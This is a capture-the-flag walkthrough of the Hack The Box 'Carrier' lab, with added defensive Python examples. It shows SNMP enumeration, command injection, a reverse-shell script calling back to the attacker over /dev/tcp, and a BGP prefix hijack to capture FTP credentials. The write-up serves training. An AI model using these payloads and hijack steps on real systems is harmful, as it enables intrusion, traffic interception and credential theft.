Today we are going to solve another CTF challenge, "Carrier". It is a retired vulnerable lab presented by Hack The Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: The IP of Carrier is 10.10.10.105
root@carrier:/tmp# lxc list
+------+---------+---------------------+------+------------+-----------+
| NAME |  STATE  |        IPV4         | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+---------------------+------+------------+-----------+
| r1   | RUNNING | 10.99.64.2 (eth0)   |      | PERSISTENT | 0         |
|      |         | 10.78.11.1 (eth2)   |      |            |           |
|      |         | 10.78.10.1 (eth1)   |      |            |           |
+------+---------+---------------------+------+------------+-----------+
| r2   | RUNNING | 10.99.64.3 (eth0)   |      | PERSISTENT | 0         |
|      |         | 10.78.12.1 (eth2)   |      |            |           |
|      |         | 10.78.10.2 (eth1)   |      |            |           |
+------+---------+---------------------+------+------------+-----------+
| r3   | RUNNING | 10.99.64.4 (eth0)   |      | PERSISTENT | 0         |
|      |         | 10.78.12.2 (eth2)   |      |            |           |
|      |         | 10.78.11.2 (eth1)   |      |            |           |
|      |         | 10.120.15.1 (eth3)  |      |            |           |
+------+---------+---------------------+------+------------+-----------+
| web  | RUNNING | 10.99.64.251 (eth0) |      | PERSISTENT | 0         |
+------+---------+---------------------+------+------------+-----------+
root@carrier:/tmp#
Let’s start off with our basic Nmap command to find out the open ports and services.
c:\PENTEST>nmap -sC -sV -p- -T4 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:16 W. Europe Summer Time
Nmap scan report for 10.10.10.105
Host is up (0.024s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.90 seconds
c:\PENTEST>nmap -sU --min-rate=5000 -T4 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:19 W. Europe Summer Time
Nmap scan report for 10.10.10.105
Host is up (0.022s latency).
Not shown: 993 open|filtered ports
PORT      STATE  SERVICE
161/udp   open   snmp
3664/udp  closed ups-engine
8900/udp  closed jmb-cds1
17423/udp closed unknown
20762/udp closed unknown
44508/udp closed unknown
45380/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
The Nmap scans show three TCP ports, 21 (FTP), 22 (SSH) and 80 (HTTP), and one open UDP port, 161 (SNMP).
As port 161 is open, we use snmpwalk to enumerate SNMP and find a string called "SN#NET_45JDX23".
root@kali:~/htb# snmpwalk -c public -v 1 10.10.10.105
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB
First we run wfuzz to gather some more information about the open port 80:
root@kali:~/htb# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.105/FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.105/FUZZ
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000223:   301        9 L      28 W     310 Ch      "css"
000000245:   301        9 L      28 W     312 Ch      "debug"
000000277:   301        9 L      28 W     310 Ch      "doc"
000000413:   301        9 L      28 W     310 Ch      "img"
000000454:   301        9 L      28 W     309 Ch      "js"
000000838:   301        9 L      28 W     312 Ch      "tools"

Total time: 3.342466
Processed Requests: 949
Filtered Requests: 943
Requests/sec.: 283.9220
We try the username "admin" with the full string we found earlier as the password, but are unable to log in. Using only "NET_45JDX23" as the password, we are able to log in.
Checking the different options in the web application, we find something interesting in the diagnostics tab: when we click the "Verify status" button, the server appears to be running the "ps" command.
To enumerate the web application further, we use Burp Suite to capture the request and find a base64-encoded string in the "check" parameter. Decoding it gives the string "quagga". The web application shows all processes containing the string "quagga", which suggests it runs "ps" piped into "grep quagga".
To verify this theory, we change the check parameter to "root", base64-encode it and then URL-encode it.
When we send the new request, the web application displays all processes that contain the string "root".
Now we check whether the web application is vulnerable to command injection by trying to run the id command on the server.
We change the parameter to "hack;id", base64-encode and URL-encode it, and forward the request to the server.
When we check the web application, we find that the "id" command was executed, which means the web application is vulnerable to command injection.
Now we replace the id command with a netcat reverse-shell one-liner.
We base64-encode and URL-encode the string, set up our listener and forward the request.
As soon as we forward the request we get a reverse shell. We spawn a TTY shell and list the current directory, where we find a file called "user.txt" containing the first flag.
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.105: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.105] 38314: NO_DATA
bash: cannot set terminal process group (2507): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~# python3 -c "import pty; pty.spawn('/bin/bash')"
root@r1:~# ls
test_intercept.pcap  user.txt
root@r1:~# cat user.txt
564*****2be
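As an added illustration (not code from the writeup or from the Carrier box), the Python below models the "check" parameter encoding described above (base64, then URL-encoding), a detector that decodes captured POST bodies and flags values carrying shell metacharacters, and the hardened way such a process filter should be handled. The request bodies are constructed samples; only the parameter name and the three filter values come from the page.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Shell metacharacters that have no business in a process-name filter.
INJECTION_RE = re.compile(r"[;&|`$<>\n]")
# Allowlist for the hardened version: what a process-name filter may contain.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

def encode_check(value):
    """Build a request body the way the writeup does: base64, then URL-encode."""
    return urlencode({"check": base64.b64encode(value.encode()).decode()})

def decode_check(body):
    """Reverse the encoding (parse_qs URL-decodes); None if it is not valid base64."""
    raw = parse_qs(body).get("check", [None])[0]
    if raw is None:
        return None
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def classify(body):
    """Label a captured POST body: benign filter, injection attempt, or undecodable."""
    value = decode_check(body)
    if value is None:
        return ("undecodable", None)
    if INJECTION_RE.search(value):
        return ("injection", value)
    return ("benign", value)

def is_safe_filter(value):
    return bool(SAFE_NAME_RE.match(value))

def safe_ps_argv(value):
    """Hardened equivalent of `ps | grep <value>`: allowlist the input and pass it
    as its own argv element, so no shell ever parses it."""
    if not is_safe_filter(value):
        raise ValueError("rejected process filter")
    return ["pgrep", "-af", "--", value]

# Constructed sample bodies (not captured from the lab), mirroring the writeup's
# three requests plus one that is not base64 at all.
SAMPLES = [encode_check("quagga"), encode_check("root"), encode_check("hack;id"),
           "check=not%20base64"]
```

Running `classify` over the four samples labels the first two benign, the third an injection and the last undecodable; the same decode step works on values copied out of a proxy history.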
Automated script to get the initial shell:
#!/usr/bin/python
"""
A script to get a reverse shell on Hack The Box retired machine - Carrier.
Write-up : https://0xrick.github.io/hack-the-box/carrier/
usage : ./shell.py [ip address] [port]
"""
import requests
import sys
import subprocess
import base64

base_url = "http://10.10.10.105"
diag_url = "http://10.10.10.105/diag.php"
session = requests.session()
login_data = {"username": "admin", "password": "NET_45JDX23"}

# diag.php base64-decodes "check" and hands it to a shell, so a command appended
# after "root" runs on the server (encode/decode keeps this valid on Python 3).
cmd = "root && bash -i >& /dev/tcp/" + sys.argv[1] + "/" + sys.argv[2] + " 0>&1"
payload = base64.b64encode(cmd.encode()).decode()
shell_data = {"check": payload}

session.post(base_url, data=login_data)          # log in to obtain a session cookie
subprocess.Popen(["nc", "-lvnp", sys.argv[2]])   # start the local listener
session.post(diag_url, data=shell_data)          # trigger the injected command
After getting a root shell we enumerate the machine but do not find anything interesting. Going back to the tickets section of the web page, we find a hint that we need to check another subnet.
We use the ping command to find all the available machines on the subnet “10.120.15.0/24”.
root@r1:~# for i in {1..255}; do ping -c 1 10.120.15.$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done
10.120.15.1
10.120.15.10
According to the ticket, there is an FTP server running on the subnet "10.120.15.0/24". We scan both IP addresses and find port 21 open on 10.120.15.10. Further enumerating the system, we find a cron job that runs a bash script in the /opt/ directory called "restore.sh". Looking at the content of the file, we see that the machine runs Border Gateway Protocol (BGP) with Quagga, so we can use a technique called BGP hijacking to take over the IP address. The script restores the BGP configuration every 10 minutes, so we remove its executable permission so that our changes to the BGP configuration are not reverted.
root@r1:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/10 * * * * /opt/restore.sh
root@r1:~# chmod -x /opt/restore.sh
Now we connect to the vty shell and check the current configuration.
root@r1:~# vtysh

Hello, this is Quagga (version 0.99.24.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

r1# show running-config
Building configuration...

Current configuration:
!
!
interface eth0
 ipv6 nd suppress-ra
 no link-detect
!
interface eth1
 ipv6 nd suppress-ra
 no link-detect
!
interface eth2
 ipv6 nd suppress-ra
 no link-detect
!
interface lo
 no link-detect
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.11.2 route-map to-as300 out
!
route-map to-as200 permit 10
!
route-map to-as300 permit 10
!
ip forwarding
!
line vty
!
end
r1#
Now we switch to configure mode. To intercept the traffic, we want 10.120.15.0/25 to use our machine as the gateway.
r1# configure terminal
r1(config)# ip prefix-list 0xdf permit 10.120.15.0/25
r1(config)# route-map to-as200 permit 10
r1(config-route-map)# match ip address prefix-list 0xdf
r1(config-route-map)# set community no-export
r1(config-route-map)# route-map to-as200 permit 20
r1(config-route-map)# route-map to-as300 deny 10
r1(config-route-map)# match ip address prefix-list 0xdf
r1(config-route-map)# route-map to-as300 permit 20
r1(config-route-map)# router bgp 100
r1(config-router)# network 10.120.15.0 mask 255.255.255.128
r1(config-router)# end
r1# clear ip bgp *
r1#
r1# show ip bgp neighbors 10.78.10.2 advertised-routes
BGP table version is 0, local router ID is 10.255.255.1
Status codes: s suppressed, d damped, h history, * valid, > best, = multipath,
              i internal, r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 10.78.10.0/24    10.78.10.1               0         32768 ?
*> 10.78.11.0/24    10.78.10.1               0         32768 ?
*> 10.99.64.0/24    10.78.10.1               0         32768 ?
*> 10.101.8.0/21    10.78.10.1               0         32768 i
*> 10.101.16.0/21   10.78.10.1               0         32768 i
*> 10.120.10.0/24   10.78.10.1                             0 300 i
*> 10.120.11.0/24   10.78.10.1                             0 300 i
*> 10.120.12.0/24   10.78.10.1                             0 300 i
*> 10.120.13.0/24   10.78.10.1                             0 300 i
*> 10.120.14.0/24   10.78.10.1                             0 300 i
*> 10.120.15.0/24   10.78.10.1                             0 300 i
*> 10.120.15.0/25   10.78.10.1               0         32768 i
*> 10.120.16.0/24   10.78.10.1                             0 300 i
*> 10.120.17.0/24   10.78.10.1                             0 300 i
*> 10.120.18.0/24   10.78.10.1                             0 300 i
*> 10.120.19.0/24   10.78.10.1                             0 300 i
*> 10.120.20.0/24   10.78.10.1                             0 300 i

Total number of prefixes 17
r1#
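The table above is why the hijack works: 10.120.15.0/25 is more specific than the /24 learned from AS 300, so longest-prefix matching sends traffic for the lower half of the /24 (including 10.120.15.10) through r1, while the route-maps hand the /25 only to AS 200 tagged no-export and withhold it from AS 300. The Python below, an added illustration and not Quagga's or the lab's code, models just those two mechanisms on a subset of the table, plus the check a network defender would run for unexpected more-specific announcements; the prefix-list and route-map names mirror the configuration shown, and AS 0 is an assumed marker for routes r1 originates itself.

```python
import ipaddress

# Subset of r1's BGP table after the /25 is injected, transcribed from the
# "advertised-routes" output. Origin 0 marks routes r1 originates itself
# (shown there with weight 32768 and an empty AS path).
BGP_TABLE = [
    ("10.120.14.0/24", 300),
    ("10.120.15.0/24", 300),   # legitimate route covering the FTP server
    ("10.120.15.0/25", 0),     # more-specific prefix injected on r1
    ("10.120.16.0/24", 300),
]

# Prefix-list and route-maps as configured in the writeup (names assumed).
PREFIX_LISTS = {"0xdf": ipaddress.ip_network("10.120.15.0/25")}
ROUTE_MAPS = {  # entries: (action, prefix-list or None for "match anything", community)
    "to-as200": [("permit", "0xdf", "no-export"), ("permit", None, None)],
    "to-as300": [("deny", "0xdf", None), ("permit", None, None)],
}

def best_route(dest, table=BGP_TABLE):
    """Longest-prefix match: the most specific covering prefix wins, whatever
    its origin, which is why a /25 diverts half of a /24."""
    ip = ipaddress.ip_address(dest)
    covering = [(ipaddress.ip_network(p), asn) for p, asn in table
                if ip in ipaddress.ip_network(p)]
    if not covering:
        return None
    net, asn = max(covering, key=lambda entry: entry[0].prefixlen)
    return (str(net), asn)

def apply_route_map(name, prefix):
    """Evaluate a route-map top to bottom; returns (advertised, community)."""
    net = ipaddress.ip_network(prefix)
    for action, plist, community in ROUTE_MAPS[name]:
        if plist is None or PREFIX_LISTS[plist] == net:  # exact-prefix match
            return (action == "permit", community)
    return (False, None)  # implicit deny at the end of every route-map

def suspicious_subprefixes(table, legitimate):
    """Defender's check: routes nested inside a known prefix but from another
    origin are the signature of a more-specific hijack."""
    hits = []
    for prefix, asn in table:
        net = ipaddress.ip_network(prefix)
        for lp, lasn in legitimate:
            lnet = ipaddress.ip_network(lp)
            if net != lnet and net.subnet_of(lnet) and asn != lasn:
                hits.append((prefix, asn, lp, lasn))
    return hits
```

`best_route("10.120.15.10")` resolves to the injected /25, while `best_route("10.120.15.200")` still follows the /24 to AS 300, which is the scope of the diversion.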
Now we start capturing packets on port 21 with tcpdump, using the interface eth2.
root@r1:~# tcpdump -i eth2 -nnXSs 0 'port 21' -w hack.pcap
tcpdump: listening on eth2, link-type EN10MB (Ethernet), capture size 262144 bytes
^C
root@kali:~/htb# nc -lvp 443
listening on [any] 443 ...
10.10.10.105: inverse host lookup failed: Unknown host
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.105] 43170
bash: cannot set terminal process group (14215): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~# ls
hack.pcap  test_intercept.pcap  user.txt
We wait for some time, interrupt the capture and check that the pcap file has been created. We then transfer the file to our system with netcat, analyze it in Wireshark and find the FTP password.
We use this password to log in to the target system via SSH, which succeeds. After logging in, we find a file called root.txt containing the final flag.
C:\Users\jacco>ssh root@10.10.10.105
root@10.10.10.105's password: BGPtelc0rout1ng
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep  9 11:26:48 UTC 2019

  System load:  0.03               Users logged in:          0
  Usage of /:   40.8% of 19.56GB   IP address for ens33:     10.10.10.105
  Memory usage: 35%                IP address for lxdbr0:    10.99.64.1
  Swap usage:   0%                 IP address for lxdbr1:    10.120.15.10

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

4 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Sep  9 10:10:25 2019 from 10.10.14.6
root@carrier:~# pwd
/root
root@carrier:~# ls
root.txt  secretdata.txt
root@carrier:~# cat root.txt
283*****866
Credits to: https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/
Author: Jacco Straathof